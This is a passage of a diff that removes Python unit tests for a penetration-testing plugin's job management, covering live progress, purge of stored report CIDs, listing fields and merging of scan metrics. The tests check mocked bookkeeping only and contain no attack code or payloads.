not_found.""" - Plugin = self._get_plugin_class() - plugin = self._build_plugin({}) - - result = Plugin.get_job_archive(plugin, job_id="missing-job") - self.assertEqual(result["error"], "not_found") - - def test_get_job_archive_r1fs_failure(self): - """get_job_archive when R1FS fails returns fetch_failed.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - plugin.r1fs.get_json.return_value = None - - result = Plugin.get_job_archive(plugin, job_id="fin-job") - self.assertEqual(result["error"], "fetch_failed") - - -class TestPhase12LiveProgress(unittest.TestCase): - """Phase 12: Live Worker Progress.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def test_worker_progress_model_roundtrip(self): - """WorkerProgress.from_dict(wp.to_dict()) preserves all fields.""" - from extensions.business.cybersec.red_mesh.models import WorkerProgress - wp = WorkerProgress( - job_id="job-1", - worker_addr="0xWorkerA", - pass_nr=2, - progress=45.5, - phase="service_probes", - ports_scanned=500, - ports_total=1024, - open_ports_found=[22, 80, 443], - completed_tests=["fingerprint_completed", "service_info_completed"], - updated_at=1700000000.0, - live_metrics={"total_duration": 30.5}, - ) - d = wp.to_dict() - wp2 = WorkerProgress.from_dict(d) - self.assertEqual(wp2.job_id, "job-1") - self.assertEqual(wp2.worker_addr, "0xWorkerA") - self.assertEqual(wp2.pass_nr, 2) - self.assertAlmostEqual(wp2.progress, 45.5) - self.assertEqual(wp2.phase, "service_probes") - self.assertEqual(wp2.ports_scanned, 500) - self.assertEqual(wp2.ports_total, 1024) - self.assertEqual(wp2.open_ports_found, [22, 
80, 443]) - self.assertEqual(wp2.completed_tests, ["fingerprint_completed", "service_info_completed"]) - self.assertEqual(wp2.updated_at, 1700000000.0) - self.assertEqual(wp2.live_metrics, {"total_duration": 30.5}) - - def test_get_job_progress_filters_by_job(self): - """get_job_progress returns only workers for the requested job.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - # Simulate two jobs' progress in the :live hset - live_data = { - "job-A:worker-1": {"job_id": "job-A", "progress": 50}, - "job-A:worker-2": {"job_id": "job-A", "progress": 75}, - "job-B:worker-3": {"job_id": "job-B", "progress": 30}, - } - plugin.chainstore_hgetall.return_value = live_data - - result = Plugin.get_job_progress(plugin, job_id="job-A") - self.assertEqual(result["job_id"], "job-A") - self.assertEqual(len(result["workers"]), 2) - self.assertIn("worker-1", result["workers"]) - self.assertIn("worker-2", result["workers"]) - self.assertNotIn("worker-3", result["workers"]) - - def test_get_job_progress_empty(self): - """get_job_progress for non-existent job returns empty workers dict.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.chainstore_hgetall.return_value = {} - - result = Plugin.get_job_progress(plugin, job_id="nonexistent") - self.assertEqual(result["job_id"], "nonexistent") - self.assertEqual(result["workers"], {}) - - def test_publish_live_progress(self): - """_publish_live_progress writes stage-based progress to CStore :live hset.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - plugin._last_progress_publish = 0 - plugin.time.return_value = 100.0 - - # Mock a local worker with state (port scan partial + fingerprint done) - worker = MagicMock() - worker.state = { - "ports_scanned": list(range(100)), - "open_ports": [22, 80], - "completed_tests": 
["fingerprint_completed"], - "done": False, - } - worker.initial_ports = list(range(1, 513)) - - plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} - - # Mock CStore lookup for pass_nr - plugin.chainstore_hget.return_value = {"job_pass": 3} - - Plugin._publish_live_progress(plugin) - - # Verify hset was called with correct key pattern - plugin.chainstore_hset.assert_called_once() - call_args = plugin.chainstore_hset.call_args - self.assertEqual(call_args.kwargs["hkey"], "test-instance:live") - self.assertEqual(call_args.kwargs["key"], "job-1:node-A") - progress_data = call_args.kwargs["value"] - self.assertEqual(progress_data["job_id"], "job-1") - self.assertEqual(progress_data["worker_addr"], "node-A") - self.assertEqual(progress_data["pass_nr"], 3) - self.assertEqual(progress_data["phase"], "service_probes") - self.assertEqual(progress_data["ports_scanned"], 100) - self.assertEqual(progress_data["ports_total"], 512) - self.assertIn(22, progress_data["open_ports_found"]) - self.assertIn(80, progress_data["open_ports_found"]) - # Stage-based progress: service_probes = stage 3 (idx 2), so 2/5*100 = 40% - self.assertEqual(progress_data["progress"], 40.0) - # Single thread — no threads field - self.assertNotIn("threads", progress_data) - - def test_publish_live_progress_multi_thread_phase(self): - """Phase is the earliest active phase; per-thread data is included.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - plugin._last_progress_publish = 0 - plugin.time.return_value = 100.0 - - # Thread 1: fully done - worker1 = MagicMock() - worker1.state = { - "ports_scanned": list(range(256)), - "open_ports": [22], - "completed_tests": ["fingerprint_completed", "service_info_completed", "web_tests_completed", "correlation_completed"], - "done": True, - } - worker1.initial_ports = list(range(1, 257)) - - # Thread 2: still on port scan (50 of 256 ports) - worker2 = MagicMock() - 
worker2.state = { - "ports_scanned": list(range(50)), - "open_ports": [], - "completed_tests": [], - "done": False, - } - worker2.initial_ports = list(range(257, 513)) - - plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} - plugin.chainstore_hget.return_value = {"job_pass": 1} - - Plugin._publish_live_progress(plugin) - - call_args = plugin.chainstore_hset.call_args - progress_data = call_args.kwargs["value"] - # Phase should be port_scan (earliest across threads), not done - self.assertEqual(progress_data["phase"], "port_scan") - # Stage-based: port_scan (idx 0) + sub-progress (306/512 * 20%) = ~12% - self.assertGreater(progress_data["progress"], 10) - self.assertLess(progress_data["progress"], 15) - # Per-thread data should be present (2 threads) - self.assertIn("threads", progress_data) - self.assertEqual(progress_data["threads"]["t1"]["phase"], "done") - self.assertEqual(progress_data["threads"]["t2"]["phase"], "port_scan") - self.assertEqual(progress_data["threads"]["t2"]["ports_scanned"], 50) - self.assertEqual(progress_data["threads"]["t2"]["ports_total"], 256) - - def test_clear_live_progress(self): - """_clear_live_progress deletes progress keys for all workers.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - Plugin._clear_live_progress(plugin, "job-1", ["worker-A", "worker-B"]) - - self.assertEqual(plugin.chainstore_hset.call_count, 2) - calls = plugin.chainstore_hset.call_args_list - keys_deleted = {c.kwargs["key"] for c in calls} - self.assertEqual(keys_deleted, {"job-1:worker-A", "job-1:worker-B"}) - for c in calls: - self.assertIsNone(c.kwargs["value"]) - - -class TestPhase14Purge(unittest.TestCase): - """Phase 14: Job Deletion & Purge.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() 
- from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _make_plugin(self): - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - return plugin - - def test_purge_finalized_collects_all_cids(self): - """Finalized purge collects archive + config + aggregated_report + worker report CIDs.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - # CStore stub for a finalized job - job_specs = { - "job_id": "job-1", - "job_status": "FINALIZED", - "job_cid": "cid-archive", - "job_config_cid": "cid-config", - } - plugin.chainstore_hget.return_value = job_specs - - # Archive contains nested CIDs - archive = { - "passes": [ - { - "aggregated_report_cid": "cid-agg-1", - "worker_reports": { - "worker-A": {"report_cid": "cid-wr-A"}, - "worker-B": {"report_cid": "cid-wr-B"}, - }, - }, - ], - } - plugin.r1fs.get_json.return_value = archive - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - - # Normalize returns the specs as-is - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # Verify all 5 CIDs were deleted - deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} - self.assertEqual(deleted_cids, {"cid-archive", "cid-config", "cid-agg-1", "cid-wr-A", "cid-wr-B"}) - self.assertEqual(result["cids_deleted"], 5) - self.assertEqual(result["cids_total"], 5) - - def test_purge_finalized_no_pass_report_cids(self): - """Finalized purge does NOT try to delete individual pass report CIDs (they are inside archive).""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "FINALIZED", - "job_cid": "cid-archive", - # No pass_reports key — finalized stubs don't have them - } - plugin.chainstore_hget.return_value 
= job_specs - plugin.r1fs.get_json.return_value = {"passes": []} - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # Only archive CID should be deleted (no pass_reports, no config, no workers) - deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} - self.assertEqual(deleted_cids, {"cid-archive"}) - - def test_purge_running_collects_all_cids(self): - """Stopped (was running) purge collects config + worker CIDs + pass report CIDs + nested CIDs.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "STOPPED", - "job_config_cid": "cid-config", - "workers": { - "node-A": {"finished": True, "canceled": True, "report_cid": "cid-wr-A"}, - }, - "pass_reports": [ - {"report_cid": "cid-pass-1"}, - ], - } - plugin.chainstore_hget.return_value = job_specs - - # Pass report contains nested CIDs - pass_report = { - "aggregated_report_cid": "cid-agg-1", - "worker_reports": { - "node-A": {"report_cid": "cid-pass-wr-A"}, - }, - } - plugin.r1fs.get_json.return_value = pass_report - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - deleted_cids = {c.args[0] for c in plugin.r1fs.delete_file.call_args_list} - self.assertEqual(deleted_cids, {"cid-config", "cid-wr-A", "cid-pass-1", "cid-agg-1", "cid-pass-wr-A"}) - - def test_purge_r1fs_failure_keeps_cstore(self): - """Partial R1FS failure leaves CStore intact and returns 'partial' status.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": 
"FINALIZED", - "job_cid": "cid-archive", - "job_config_cid": "cid-config", - } - plugin.chainstore_hget.return_value = job_specs - plugin.r1fs.get_json.return_value = {"passes": []} - - # First CID deletes ok, second raises - plugin.r1fs.delete_file.side_effect = [True, Exception("disk error")] - - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "partial") - self.assertEqual(result["cids_deleted"], 1) - self.assertEqual(result["cids_failed"], 1) - self.assertEqual(result["cids_total"], 2) - - # CStore should NOT be tombstoned - tombstone_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("value") is None - ] - self.assertEqual(len(tombstone_calls), 0) - - def test_purge_cleans_live_progress(self): - """Purge deletes live progress keys for the job from :live hset.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "STOPPED", - "workers": {"node-A": {"finished": True}}, - } - plugin.chainstore_hget.return_value = job_specs - plugin.r1fs.delete_file.return_value = True - - # Live hset has keys for this job and another - plugin.chainstore_hgetall.return_value = { - "job-1:node-A": {"progress": 100}, - "job-1:node-B": {"progress": 50}, - "job-2:node-C": {"progress": 30}, - } - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # Check that live progress keys for job-1 were deleted - live_delete_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance:live" and c.kwargs.get("value") is None - ] - deleted_keys = {c.kwargs["key"] for c in live_delete_calls} - self.assertEqual(deleted_keys, {"job-1:node-A", "job-1:node-B"}) - # job-2 key should NOT be 
touched - self.assertNotIn("job-2:node-C", deleted_keys) - - def test_purge_success_tombstones_cstore(self): - """After all CIDs deleted, CStore key is tombstoned (set to None).""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - - job_specs = { - "job_id": "job-1", - "job_status": "FINALIZED", - "job_cid": "cid-archive", - } - plugin.chainstore_hget.return_value = job_specs - plugin.r1fs.get_json.return_value = {"passes": []} - plugin.r1fs.delete_file.return_value = True - plugin.chainstore_hgetall.return_value = {} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - result = Plugin.purge_job(plugin, "job-1") - self.assertEqual(result["status"], "success") - - # CStore tombstone: hset(hkey=instance_id, key=job_id, value=None) - tombstone_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance" - and c.kwargs.get("key") == "job-1" - and c.kwargs.get("value") is None - ] - self.assertEqual(len(tombstone_calls), 1) - - def test_stop_and_delete_delegates_to_purge(self): - """stop_and_delete_job marks job stopped then delegates to purge_job.""" - Plugin = self._get_plugin_class() - plugin = self._make_plugin() - plugin.scan_jobs = {} - - job_specs = { - "job_id": "job-1", - "job_status": "RUNNING", - "workers": {"node-A": {"finished": False}}, - } - plugin.chainstore_hget.return_value = job_specs - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - - # Mock purge_job to verify delegation - purge_result = {"status": "success", "job_id": "job-1", "cids_deleted": 3, "cids_total": 3} - plugin.purge_job = MagicMock(return_value=purge_result) - - result = Plugin.stop_and_delete_job(plugin, "job-1") - - # Verify job was marked stopped before purge - hset_calls = [ - c for c in plugin.chainstore_hset.call_args_list - if c.kwargs.get("hkey") == "test-instance" and c.kwargs.get("key") == "job-1" - ] - self.assertEqual(len(hset_calls), 1) - saved_specs = 
hset_calls[0].kwargs["value"] - self.assertEqual(saved_specs["job_status"], "STOPPED") - self.assertTrue(saved_specs["workers"]["node-A"]["finished"]) - self.assertTrue(saved_specs["workers"]["node-A"]["canceled"]) - - # Verify purge was called - plugin.purge_job.assert_called_once_with("job-1") - self.assertEqual(result, purge_result) - - -class TestPhase15Listing(unittest.TestCase): - """Phase 15: Listing Endpoint Optimization.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def test_list_finalized_returns_stub_fields(self): - """Finalized jobs return exact CStoreJobFinalized fields.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - finalized_stub = { - "job_id": "job-1", - "job_status": "FINALIZED", - "target": "10.0.0.1", - "task_name": "scan-1", - "risk_score": 75, - "run_mode": "SINGLEPASS", - "duration": 120.5, - "pass_count": 1, - "launcher": "0xLauncher", - "launcher_alias": "node1", - "worker_count": 2, - "start_port": 1, - "end_port": 1024, - "date_created": 1700000000.0, - "date_completed": 1700000120.0, - "job_cid": "QmArchive123", - "job_config_cid": "QmConfig456", - } - plugin.chainstore_hgetall.return_value = {"job-1": finalized_stub} - plugin._normalize_job_record = MagicMock(return_value=("job-1", finalized_stub)) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("job-1", result) - entry = result["job-1"] - - # All CStoreJobFinalized fields present - self.assertEqual(entry["job_id"], "job-1") - self.assertEqual(entry["job_status"], "FINALIZED") - self.assertEqual(entry["job_cid"], "QmArchive123") - self.assertEqual(entry["job_config_cid"], "QmConfig456") - 
self.assertEqual(entry["target"], "10.0.0.1") - self.assertEqual(entry["risk_score"], 75) - self.assertEqual(entry["duration"], 120.5) - self.assertEqual(entry["pass_count"], 1) - self.assertEqual(entry["worker_count"], 2) - - def test_list_running_stripped(self): - """Running jobs have listing fields but no heavy data.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - - running_spec = { - "job_id": "job-2", - "job_status": "RUNNING", - "target": "10.0.0.2", - "task_name": "scan-2", - "risk_score": 0, - "run_mode": "CONTINUOUS_MONITORING", - "start_port": 1, - "end_port": 65535, - "date_created": 1700000000.0, - "launcher": "0xLauncher", - "launcher_alias": "node1", - "job_pass": 3, - "job_config_cid": "QmConfig789", - "workers": { - "addr-A": {"start_port": 1, "end_port": 32767, "finished": False, "report_cid": "QmBigReport1"}, - "addr-B": {"start_port": 32768, "end_port": 65535, "finished": False, "report_cid": "QmBigReport2"}, - }, - "timeline": [ - {"event": "created", "ts": 1700000000.0}, - {"event": "started", "ts": 1700000001.0}, - ], - "pass_reports": [ - {"pass_nr": 1, "report_cid": "QmPass1"}, - {"pass_nr": 2, "report_cid": "QmPass2"}, - ], - "redmesh_job_start_attestation": {"big": "blob"}, - } - plugin.chainstore_hgetall.return_value = {"job-2": running_spec} - plugin._normalize_job_record = MagicMock(return_value=("job-2", running_spec)) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("job-2", result) - entry = result["job-2"] - - # Listing essentials present - self.assertEqual(entry["job_id"], "job-2") - self.assertEqual(entry["job_status"], "RUNNING") - self.assertEqual(entry["target"], "10.0.0.2") - self.assertEqual(entry["task_name"], "scan-2") - self.assertEqual(entry["run_mode"], "CONTINUOUS_MONITORING") - self.assertEqual(entry["job_pass"], 3) - self.assertEqual(entry["worker_count"], 2) - self.assertEqual(entry["pass_count"], 2) - - # Heavy fields stripped - 
self.assertNotIn("workers", entry) - self.assertNotIn("timeline", entry) - self.assertNotIn("pass_reports", entry) - self.assertNotIn("redmesh_job_start_attestation", entry) - self.assertNotIn("job_config_cid", entry) - self.assertNotIn("report_cid", entry) - - -class TestPhase16ScanMetrics(unittest.TestCase): - """Phase 16: Scan Metrics Collection.""" - - def test_metrics_collector_empty_build(self): - """build() with zero data returns ScanMetrics with defaults, no crash.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - result = mc.build() - d = result.to_dict() - self.assertEqual(d.get("total_duration", 0), 0) - self.assertEqual(d.get("rate_limiting_detected", False), False) - self.assertEqual(d.get("blocking_detected", False), False) - # No crash, sparse output - self.assertNotIn("connection_outcomes", d) - self.assertNotIn("response_times", d) - - def test_metrics_collector_records_connections(self): - """After recording outcomes, connection_outcomes has correct counts.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(100) - mc.record_connection("connected", 0.05) - mc.record_connection("connected", 0.03) - mc.record_connection("timeout", 1.0) - mc.record_connection("refused", 0.01) - d = mc.build().to_dict() - outcomes = d["connection_outcomes"] - self.assertEqual(outcomes["connected"], 2) - self.assertEqual(outcomes["timeout"], 1) - self.assertEqual(outcomes["refused"], 1) - self.assertEqual(outcomes["total"], 4) - # Response times computed - rt = d["response_times"] - self.assertIn("mean", rt) - self.assertIn("p95", rt) - self.assertEqual(rt["count"], 4) - - def test_metrics_collector_records_probes(self): - """After recording probes, probe_breakdown has entries.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(10) - 
mc.record_probe("_service_info_http", "completed") - mc.record_probe("_service_info_ssh", "completed") - mc.record_probe("_web_test_xss", "skipped:no_http") - d = mc.build().to_dict() - self.assertEqual(d["probes_attempted"], 3) - self.assertEqual(d["probes_completed"], 2) - self.assertEqual(d["probes_skipped"], 1) - self.assertEqual(d["probe_breakdown"]["_service_info_http"], "completed") - self.assertEqual(d["probe_breakdown"]["_web_test_xss"], "skipped:no_http") - - def test_metrics_collector_phase_durations(self): - """start/end phases produce positive durations.""" - import time - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(10) - mc.phase_start("port_scan") - time.sleep(0.01) - mc.phase_end("port_scan") - d = mc.build().to_dict() - self.assertIn("phase_durations", d) - self.assertGreater(d["phase_durations"]["port_scan"], 0) - - def test_metrics_collector_findings(self): - """record_finding tracks severity distribution.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(10) - mc.record_finding("HIGH") - mc.record_finding("HIGH") - mc.record_finding("MEDIUM") - mc.record_finding("INFO") - d = mc.build().to_dict() - fd = d["finding_distribution"] - self.assertEqual(fd["HIGH"], 2) - self.assertEqual(fd["MEDIUM"], 1) - self.assertEqual(fd["INFO"], 1) - - def test_metrics_collector_coverage(self): - """Coverage tracks ports scanned vs in range.""" - from extensions.business.cybersec.red_mesh.pentest_worker import MetricsCollector - mc = MetricsCollector() - mc.start_scan(100) - for i in range(50): - mc.record_connection("connected" if i < 5 else "refused", 0.01) - # Simulate finding 5 open ports with banner confirmation - for i in range(5): - mc.record_open_port(8000 + i, protocol="http" if i < 3 else "ssh", banner_confirmed=(i < 3)) - d = mc.build().to_dict() - cov = d["coverage"] - 
self.assertEqual(cov["ports_in_range"], 100) - self.assertEqual(cov["ports_scanned"], 50) - self.assertEqual(cov["coverage_pct"], 50.0) - self.assertEqual(cov["open_ports_count"], 5) - # Open port details - self.assertEqual(len(d["open_port_details"]), 5) - self.assertEqual(d["open_port_details"][0]["port"], 8000) - self.assertEqual(d["open_port_details"][0]["protocol"], "http") - self.assertTrue(d["open_port_details"][0]["banner_confirmed"]) - self.assertFalse(d["open_port_details"][3]["banner_confirmed"]) - # Banner confirmation - self.assertEqual(d["banner_confirmation"]["confirmed"], 3) - self.assertEqual(d["banner_confirmation"]["guessed"], 2) - - def test_scan_metrics_model_roundtrip(self): - """ScanMetrics.from_dict(sm.to_dict()) preserves all fields.""" - from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics - sm = ScanMetrics( - phase_durations={"port_scan": 10.5, "fingerprint": 3.2}, - total_duration=15.0, - connection_outcomes={"connected": 50, "timeout": 5, "total": 55}, - response_times={"min": 0.01, "max": 1.0, "mean": 0.1, "median": 0.08, "stddev": 0.05, "p95": 0.5, "p99": 0.9, "count": 55}, - rate_limiting_detected=True, - blocking_detected=False, - coverage={"ports_in_range": 1000, "ports_scanned": 1000, "ports_skipped": 0, "coverage_pct": 100.0}, - probes_attempted=5, - probes_completed=4, - probes_skipped=1, - probes_failed=0, - probe_breakdown={"_service_info_http": "completed"}, - finding_distribution={"HIGH": 3, "MEDIUM": 2}, - ) - d = sm.to_dict() - sm2 = ScanMetrics.from_dict(d) - self.assertEqual(sm2.to_dict(), d) - - def test_scan_metrics_strip_none(self): - """Empty/None fields stripped from serialization.""" - from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics - sm = ScanMetrics() - d = sm.to_dict() - self.assertNotIn("phase_durations", d) - self.assertNotIn("connection_outcomes", d) - self.assertNotIn("response_times", d) - self.assertNotIn("slow_ports", d) - 
self.assertNotIn("probe_breakdown", d) - - def test_merge_worker_metrics(self): - """_merge_worker_metrics sums outcomes, coverage, findings; maxes duration; ORs flags.""" - TestPhase15Listing._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - m1 = { - "connection_outcomes": {"connected": 30, "timeout": 5, "total": 35}, - "coverage": {"ports_in_range": 500, "ports_scanned": 500, "ports_skipped": 0, "coverage_pct": 100.0, "open_ports_count": 3}, - "finding_distribution": {"HIGH": 2, "MEDIUM": 1}, - "service_distribution": {"http": 2, "ssh": 1}, - "probe_breakdown": {"_service_info_http": "completed", "_web_test_xss": "completed"}, - "phase_durations": {"port_scan": 30.0, "fingerprint": 10.0, "service_probes": 15.0}, - "response_times": {"min": 0.01, "max": 0.5, "mean": 0.05, "median": 0.04, "stddev": 0.03, "p95": 0.2, "p99": 0.4, "count": 500}, - "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 0, "probes_failed": 0, - "total_duration": 60.0, - "rate_limiting_detected": False, "blocking_detected": False, - "open_port_details": [ - {"port": 22, "protocol": "ssh", "banner_confirmed": True}, - {"port": 80, "protocol": "http", "banner_confirmed": True}, - {"port": 443, "protocol": "http", "banner_confirmed": False}, - ], - "banner_confirmation": {"confirmed": 2, "guessed": 1}, - } - m2 = { - "connection_outcomes": {"connected": 20, "timeout": 10, "total": 30}, - "coverage": {"ports_in_range": 500, "ports_scanned": 400, "ports_skipped": 100, "coverage_pct": 80.0, "open_ports_count": 2}, - "finding_distribution": {"HIGH": 1, "LOW": 3}, - "service_distribution": {"http": 1, "mysql": 1}, - "probe_breakdown": {"_service_info_http": "completed", "_service_info_mysql": "completed", "_web_test_xss": "failed"}, - "phase_durations": {"port_scan": 45.0, "fingerprint": 8.0, "service_probes": 20.0}, - "response_times": {"min": 0.02, "max": 0.8, "mean": 0.08, "median": 0.06, "stddev": 0.05, "p95": 0.3, 
"p99": 0.7, "count": 400}, - "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 1, "probes_failed": 0, - "total_duration": 75.0, - "rate_limiting_detected": True, "blocking_detected": False, - "open_port_details": [ - {"port": 80, "protocol": "http", "banner_confirmed": True}, # duplicate port 80 - {"port": 3306, "protocol": "mysql", "banner_confirmed": True}, - ], - "banner_confirmation": {"confirmed": 2, "guessed": 0}, - } - merged = PentesterApi01Plugin._merge_worker_metrics([m1, m2]) - # Sums - self.assertEqual(merged["connection_outcomes"]["connected"], 50) - self.assertEqual(merged["connection_outcomes"]["timeout"], 15) - self.assertEqual(merged["connection_outcomes"]["total"], 65) - self.assertEqual(merged["coverage"]["ports_in_range"], 1000) - self.assertEqual(merged["coverage"]["ports_scanned"], 900) - self.assertEqual(merged["coverage"]["ports_skipped"], 100) - self.assertEqual(merged["coverage"]["coverage_pct"], 90.0) - self.assertEqual(merged["coverage"]["open_ports_count"], 5) - self.assertEqual(merged["finding_distribution"]["HIGH"], 3) - self.assertEqual(merged["finding_distribution"]["LOW"], 3) - self.assertEqual(merged["finding_distribution"]["MEDIUM"], 1) - self.assertEqual(merged["probes_attempted"], 6) - self.assertEqual(merged["probes_completed"], 5) - self.assertEqual(merged["probes_skipped"], 1) - # Service distribution summed - self.assertEqual(merged["service_distribution"]["http"], 3) - self.assertEqual(merged["service_distribution"]["ssh"], 1) - self.assertEqual(merged["service_distribution"]["mysql"], 1) - # Probe breakdown: union, worst status wins - self.assertEqual(merged["probe_breakdown"]["_service_info_http"], "completed") - self.assertEqual(merged["probe_breakdown"]["_service_info_mysql"], "completed") - self.assertEqual(merged["probe_breakdown"]["_web_test_xss"], "failed") # failed > completed - # Phase durations: max per phase (threads/nodes run in parallel) - self.assertEqual(merged["phase_durations"]["port_scan"], 
45.0) - self.assertEqual(merged["phase_durations"]["fingerprint"], 10.0) - self.assertEqual(merged["phase_durations"]["service_probes"], 20.0) - # Response times: merged stats - rt = merged["response_times"] - self.assertEqual(rt["min"], 0.01) # global min - self.assertEqual(rt["max"], 0.8) # global max - self.assertEqual(rt["count"], 900) # total count - # Weighted mean: (0.05*500 + 0.08*400) / 900 ≈ 0.0633 - self.assertAlmostEqual(rt["mean"], 0.0633, places=3) - self.assertEqual(rt["p95"], 0.3) # max of per-thread p95 - self.assertEqual(rt["p99"], 0.7) # max of per-thread p99 - # Max duration - self.assertEqual(merged["total_duration"], 75.0) - # OR flags - self.assertTrue(merged["rate_limiting_detected"]) - self.assertFalse(merged["blocking_detected"]) - # Open port details: deduplicated by port, sorted - opd = merged["open_port_details"] - self.assertEqual(len(opd), 4) # 22, 80, 443, 3306 (80 deduplicated) - self.assertEqual(opd[0]["port"], 22) - self.assertEqual(opd[1]["port"], 80) - self.assertEqual(opd[2]["port"], 443) - self.assertEqual(opd[3]["port"], 3306) - # Banner confirmation: summed - self.assertEqual(merged["banner_confirmation"]["confirmed"], 4) - self.assertEqual(merged["banner_confirmation"]["guessed"], 1) - - - def test_close_job_merges_thread_metrics(self): - """16b: _close_job replaces generically-merged scan_metrics with properly summed metrics.""" - TestPhase15Listing._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - - # Two mock workers with different scan_metrics - worker1 = MagicMock() - worker1.get_status.return_value = { - "open_ports": [80], "service_info": {}, "scan_metrics": { - "connection_outcomes": {"connected": 10, "timeout": 2, "total": 12}, - "total_duration": 30.0, - "probes_attempted": 2, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 0, - 
"rate_limiting_detected": False, "blocking_detected": False, - } - } - worker2 = MagicMock() - worker2.get_status.return_value = { - "open_ports": [443], "service_info": {}, "scan_metrics": { - "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, - "total_duration": 45.0, - "probes_attempted": 2, "probes_completed": 1, "probes_skipped": 1, "probes_failed": 0, - "rate_limiting_detected": True, "blocking_detected": False, - } - } - plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} - - # _get_aggregated_report with merge_objects_deep would do last-writer-wins on leaf ints - # Simulate that by returning worker2's metrics (wrong — should be summed) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80, 443], "service_info": {}, - "scan_metrics": { - "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, - "total_duration": 45.0, - } - }) - # Use real static method for merge - plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics - - saved_reports = [] - def capture_add_json(data, show_logs=False): - 